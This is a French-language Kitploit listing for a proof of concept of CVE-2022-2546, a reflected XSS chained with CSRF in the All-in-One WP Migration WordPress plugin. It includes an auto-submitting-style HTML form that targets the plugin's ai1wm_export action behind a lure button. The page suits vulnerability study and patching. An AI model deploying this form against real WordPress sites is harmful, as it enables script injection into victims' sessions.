Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-2546 — All-in-One WP Migration < 7.63 - XSS reflété non authentifié + CSRF | Kitploit
Outils/GitHubGitHub/openxp-research/cve-2022-2546
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubopenxp-research/cve-2022-2546

CVE-2022-2546

All-in-One WP Migration < 7.63 - XSS reflété non authentifié + CSRF

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

All-in-One WP Migration < 7.63 - XSS Réfléchi non authentifié + CSRF

Description

Le plugin utilise un type de contenu incorrect et n'échappe pas correctement la réponse de l'action ai1wm_export, permettant à un attaquant de créer une requête qui, lorsqu'elle est soumise par un visiteur, injectera du HTML ou du JavaScript arbitraire dans la réponse, laquelle sera exécutée dans la session de la victime.

Preuve de Concept

Attaquant

Pour reproduire la faille, nous pouvons exporter tout le contenu du site web par le plugin et insérer un nom invalide dans le nom du fichier de sortie.

VIDÉO DE L'ATTAQUANT

En validant la vulnérabilité, il est possible de combiner l'attaque avec un CSRF, ce qui forcera le navigateur de la victime à envoyer une requête avec la charge utile.

Victime

VIDÉO DE LA VICTIME

Code

root@kitploit:~
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
  <!--
    Note: The secret key must be obtained through other means.
    It is stored in the site option `ai1wm_secret_key`, but is
    static for the lifetime of the site.
  -->
  <input type="hidden" name="secret_key" value="[secret_key]">
  <input type="hidden" name="ai1wm_manual_export" value="1">
  <input type="hidden" name="archive" value="">

  <input type="submit" value="Get rich!">
</form>

Versions affectées

All-in-One WP Migration < 7.63

Références

Sucuri

WPScan

Hacking Force

Cross-Site Scripting (XSS)

Classification

Type: Cross-Site Scripting

OWASP TOP 10: A03:2021-Injection

CWE: CWE-79 Neutralisation incorrecte des entrées lors de la génération de pages Web ('Cross-site Scripting')

Chercheurs/Hackers

Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) et Guilherme Acerbi (Ghost).

Télécharger l’outil